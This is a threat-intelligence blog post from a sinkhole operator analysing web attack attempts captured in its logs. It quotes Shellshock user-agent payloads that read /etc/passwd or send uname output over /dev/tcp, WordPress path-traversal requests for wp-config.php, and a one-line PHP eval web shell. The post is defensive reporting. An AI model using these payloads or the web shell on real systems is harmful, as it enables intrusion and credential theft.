Web attacks caught by Virus Tracker

With having the largest botnet monitoring system in the world (with more than 8.000 domains) we see all kinds of bots connecting to our sinkholes – including robots that try to find and exploit certain vulnerabilities like shellshock, some admin panels or that try to find SQLIs.

Finding exploit attempts in our dataset

Finding such entries is fairly easy – we can simply download all APT infection data for this year and then have a full-text search for anything containing “{“.

Request paths containing the exploit:

User Agents being evil:
() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd;
() { test;};echo Content-type: text/plain; echo; echo; /bin/cat /etc/passwd
() { :;}; /bin/bash -c echo [domain]/cgi-bin/php5 > /dev/tcp/; echo [domain]/cgi-bin/php5 > /dev/udp/
() { :;}; /bin/bash -c echo [domain]/cgi-bin/test-cgi > /dev/tcp/; echo [domain]/cgi-bin/test-cgi > /dev/udp/
() { :;}; /bin/bash -c echo [domain]/cgi-bin/php-cgi > /dev/tcp/; echo [domain]/cgi-bin/php-cgi > /dev/udp/
() { :;}; /bin/bash -c echo [domain]/cgi-bin/php-cgi > /dev/tcp/; echo [domain]/cgi-bin/php-cgi > /dev/udp/
() { :;}; /bin/bash -c echo [domain]/ > /dev/tcp/; echo [domain]/ > /dev/udp/
() { :;}; /bin/bash -c echo [domain]/phppath/cgi_wrapper?  > /dev/tcp/; /bin/uname -a > /dev/tcp/; echo [domain]/phppath/cgi_wrapper? > /dev/udp/

Check out the first one. We can use the Virus Tracker tools to decode this base64 “ZWNobycycTRtbmozaGc2bW5nZmgnOw==” and get as a result “echo’2q4mnj3hg6mngfh’;”. It is expected that the evil tool doing the request with this shellshock poisoned user agent expects this string “2q4mnj3hg6mngfh” in the response to verify whether the server is vulnerable or not.

In the other attempts you can see that it tries to pipe some information to remote TCP connections. We have plenty of those user agents and just pasted a few above.

Where are those evil robots scanning for vulnerable servers coming from?

Due to the nature of TCP we see all IPs of the robots doing the scanning. For the base64 one from above we have seen the exact same requests coming from these locations:

2015-01-13 22:58:28	LeaseWeb	Netherlands
2015-01-13 23:00:52	NetArt webhosting servers	Poland
2015-01-13 22:20:24	GoDaddy.com LLC	United States
2015-01-13 22:22:15	GoDaddy.com LLC	United States
2015-01-13 23:07:06	GoDaddy.com LLC	United States
2015-01-14 07:46:58	Unified Layer	United States
2015-01-13 23:02:27	Relink Ltd.	Russian Federation
2015-01-13 23:05:38	Centro Canario de Tratamiento de Informacion SLU	Spain

You can check it out yourself here http://virustracker.net/, have a look at the user agents there!

And here the list of the most recent attempts from today:

2015-03-05 20:12:52	1&1 Internet	United States	/cgi-sys/php4	() { :;}; /bin/bash -c echo IMGGOOGLE.COM/cgi-sys/php4  > /dev/tcp/; /bin/uname -a > /dev/tcp/; echo IMGGOOGLE.COM/cgi-sys/php4 > /dev/udp/
2015-03-05 20:51:53	1&1 Internet	United States	/cgi-sys/php4	() { :;}; /bin/bash -c echo INDIA-VIDEOER.COM/cgi-sys/php4  > /dev/tcp/; /bin/uname -a > /dev/tcp/; echo INDIA-VIDEOER.COM/cgi-sys/php4 > /dev/udp/
2015-03-05 21:24:08	1&1 Internet	United States	/cgi-sys/php4	() { :;}; /bin/bash -c echo INFO-WEEK.COM/cgi-sys/php4  > /dev/tcp/; /bin/uname -a > /dev/tcp/; echo INFO-WEEK.COM/cgi-sys/php4 > /dev/udp/
2015-03-06 02:13:12	1&1 Internet	United States	/cgi-sys/php4	() { :;}; /bin/bash -c echo JASMINJORDEN.COM/cgi-sys/php4  > /dev/tcp/; /bin/uname -a > /dev/tcp/; echo JASMINJORDEN.COM/cgi-sys/php4 > /dev/udp/

Robots scanning for vulnerable admin panels

Of course we see also plenty and plenty of attempts to find and hack admin panels like:

2015-03-05 23:43:23	TalkTalk	United Kingdom	/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
2015-03-05 23:43:25	Wave-Max S.r.l.	Italy	/wp-content/themes/infocus/lib/scripts/dl-skin.php
2015-03-05 23:43:36	MDNX Enterprise Services Limited	United Kingdom	/wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php
2015-03-05 23:43:40	Wave-Max S.r.l.	Italy	/wp-content/themes/dejavu/lib/scripts/dl-skin.php
2015-03-06 00:25:36	SpecAvtomatika LTD	Ukraine	/administrator/index.php

It might be interesting and possible to take the Virus Tracker dataset and find publicly unknown vulnerabilities that are exploited actively by criminals.

A specifically interesting one which contains additional code encoded is this:


The decoded text (from base64) is:

The zip file is still up and contains a PHP file containing only this line:
< ? php eval(stripslashes(@$_POST[(chr(112).chr(49))])); ? >